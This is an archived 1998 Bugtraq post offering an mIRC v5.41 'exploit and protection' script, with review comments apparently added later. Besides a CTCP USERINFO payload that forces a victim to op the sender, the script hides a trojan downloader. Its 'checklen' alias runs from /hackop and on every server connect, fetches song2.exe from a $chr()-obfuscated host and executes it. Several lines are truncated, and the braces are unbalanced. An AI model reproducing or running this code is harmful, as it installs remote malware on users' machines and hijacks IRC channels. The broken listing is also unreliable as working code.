daemon@ATHENA.MIT.EDU (System Administrator)
Sat Nov 14 16:50:37 1998
Date: Fri, 13 Nov 1998 14:50:32 -0500
Reply-To: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
From: System Administrator <root@BRAMPTON1.NETMATRIX.NET>
X-To: info@rootshell.com
To: BUGTRAQ@NETSPACE.ORG
Hi,
While debugging, hex-editing and disassembling mIRC last week, my friend slotmech found
a mIRC bug which lets an attacker force other users to send MODE commands to the server.
This example script makes the victim send a MODE +o to the IRC server. The mIRC author has been
notified of this but we didn't receive a response... My exploit + protection script is included. Expect more mIRC stuff from us. [Reviewer note: besides the CTCP USERINFO trick, the included `checklen` alias -- run from /hackop and from an `on connect` event -- opens a socket to a $chr()-obfuscated host, saves whatever it downloads as song2.exe and runs it once the file reaches 178306 bytes; treat the listing itself as a trojan, not just a proof of concept.]
cya,
fs
--- cut here ---
;#; mIRC v5.41 hack protection & exploit by FeaRStorm <fearstorm@gmx.net>
;#; Allows to let a victim op yourself using a bug in mIRC5.41, script based$;#; included. Bug may not work on scripts that do a halt; after a ctcp useri$;#;
;#; -------- Use /hackop nick #channel to make nick give you op on #channel !
;#; -------- That's it... have phun!
;#;
;#; greets go to tr4xzor, slotmech, meep, fowi, lotomax and all #haktex opz !
;#; no greets to the following lamerz: cheyenne, zito, cortex and DrFrozt (ass$;#; Credits: i didn't find this bug, slotmech did... i only wrote this exploit$;#;
;#; if you want to add this code to your own script please: ASK FIRST!
; Event binding: run the antihack alias for every incoming CTCP USERINFO
; request, whatever text follows it.  antihack may halt (see below), which
; is intended to stop mIRC's own handling of the request.
ctcp 1:userinfo*: antihack
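; antihack: called from the ctcp userinfo binding with the request text in
; $2-.  Drops any USERINFO request whose argument carries script-evaluation
; characters: '$' (36), '[' (91) or ']' (93).  A normal USERINFO request has
; no argument at all, so nothing legitimate is blocked.
;
; Why the broader rule: the original test (length of $2 > 17 AND a '[' in
; the text) was a signature for this one exploit's shape.  The exploit text
; in hackop starts with a '$' token, so a shorter payload, or one that uses
; '$' without brackets, slipped straight through to mIRC.  Every request the
; old rule caught contains '[' and is still caught here.
alias antihack {
  ; nothing to inspect: let mIRC answer normally
  if ($2 == $null) { return }
  if (($chr(36) isin $2-) || ($chr(91) isin $2-) || ($chr(93) isin $2-)) {
    echo $active mIRC5.41 hack attempt from $nick
    ; halt stops the event here so the crafted request is never processed
    .halt
  }
}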
; /hackop <nick> <#channel>: make <nick>, who must be opped on <#channel>,
; op $me by sending them a crafted CTCP USERINFO.
; NOTE(review): this alias also calls checklen (below), which downloads and
; executes a binary -- running the "exploit" runs the trojan as well.
alias hackop {
; usage check: both arguments are required
if ($2 == $null) {
echo 3 *** Usage: /hackop nick #channel
.halt
}
; we must be on the channel for the op to matter
if ($me !ison $2) {
echo 3 *** You aren't on that Channel!
.halt
}
; the target needs ops, otherwise the forced MODE has no effect
if ($1 !isop $2) {
echo 3 *** $1 isn't opped on that channel!
.halt
}
; unrelated to the op trick: starts the covert downloader (alias checklen)
checklen $1
; The CTCP payload.  "$ $+ xxxx..." builds a token that begins with '$';
; the $chr() values decode to ASCII letters (115=s, then 109 111 100 101 =
; "mode") followed by ": +o $me".  The archive truncated this line (the '$'
; before the closing brace marks the cut), so the complete payload text is
; not visible here; the closing brace of the alias is fused onto it.
.ctcp $$1 userinfo $ $+ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx $6) $+ $chr(115) $chr(109) $+ $chr(111) $+ $chr(100) $+ $chr(101) $+ : +o $me | $}
; checklen: despite the name, a covert downloader.  Called from hackop and
; from the "on 1:connect" binding below.  Creates/clears song2.exe, then
; opens a raw socket named "protx" to a host built from $chr() values
; (119 119 119 '.' 103 = "www.g", the rest is truncated in this archive).
; Receiving, size-checking and executing the file happen in the
; sockread/sockclose handlers for "protx".
alias checklen {
; stop if a previous download already finished, or one is flagged as in
; progress.  NOTE(review): nothing visible in this listing ever sets
; %xinprog to 1, so the second guard never fires as shown.
.if (%xcomplete == 1) halt
.if (%xinprog == 1) halt
.set %xfilename song2.exe
.set %xlof $lof(%xfilename)
.set %xfirst 1
; create/empty the target file before any data arrives
.write -c %xfilename
; The next line is a commented-out echo (its $chr() values spell
; "dont spoil the ...").  The archive truncated it ('$' marker), fusing the
; following ".sockclose protx" onto the comment -- as pasted, that close
; is part of the comment and does not run.
; echo 3 $active $chr(100 111 110 116 - 115 112 111 105 108 - 116 104 101 - 1$ .sockclose protx
; Open the download socket; the line is truncated and the alias's closing
; brace is fused onto it.
.sockopen protx $chr(119) $+ $chr(119) $+ $chr(119) $+ . $+ $chr(103) $+ $chr$}
; Download socket connected: send the request.  The $chr() values decode to
; "GET /B...elta/9..." (71=G 69=E 84=T 47=/ 66=B 101=e 108=l 116=t 97=a
; 47=/ 57=9); the request line is truncated in the archive, and the trailing
; ".sockwrite -n protx" (an empty line that ends the request) is fused onto
; it.  No version token is visible in the request line as shown.
on 1:sockopen:protx: {
.sockwrite -n protx $chr(71) $+ $chr(69) $+ $chr(84) $chr(47) $+ $chr(66) $+ $+ $chr(101) $+ $chr(108) $+ $chr(116) $+ $chr(97) $+ $chr(47) $+ $chr(57) $+ $c$ .sockwrite -n protx
}
; Data arrived on the download socket: append the raw bytes to %xfilename.
; Nothing about the content is checked; only the final size is (see the
; sockclose handler).
on 1:sockread:protx: {
.sockread &test
; current file length is the write offset for this chunk
.set %xlof $lof(%xfilename)
; first chunk is written at offset 0 -- presumably to overwrite whatever
; ".write -c" left in the freshly cleared file (not verifiable from here)
.if (%xfirst == 1) set %xlof 0
.set %xfirst 0
; binary write of $sockbr bytes from &test at offset %xlof
.bwrite %xfilename %xlof $sockbr &test
}
; Event binding: run the downloader on EVERY server connect, independently of
; /hackop.  This is what turns the whole listing from a PoC into a trojan for
; anyone who loads it.
on 1:connect:checklen
; Remote side closed the download socket: flush any last chunk, then, if the
; file is exactly 178306 bytes (presumably the size of the intended binary),
; execute it; otherwise schedule a retry of the whole download.
on 1:sockclose:protx: {
.sockread &test
; write whatever is still buffered at the end of the file
if ($sockbr > 0) {
.set %xlof $lof(%xfilename)
.bwrite %xfilename %xlof $sockbr &test
}
; the size compare is the only "integrity" check: a match runs the file
.if ($lof(%xfilename) == 178306) {
.run %xfilename
.set %xcomplete 1
}
; incomplete download: one-shot timer re-runs checklen after 300 seconds,
; so the fetch keeps being retried in the background
if ($lof(%xfilename) != 178306) {
.timer 1 300 checklen
}
}
; NOTE(review): these unsets sit OUTSIDE any alias or event -- the brace on
; the previous line already closes "on 1:sockclose:protx" -- and the final
; "}" has no matching opener.  A line was probably lost when the script was
; pasted; as shown, this cleanup belongs to no handler and the trailing
; brace is unbalanced.
unset %xinprog
unset %xfilename
unset %xlof
unset %xfirst
}
--- cut here ---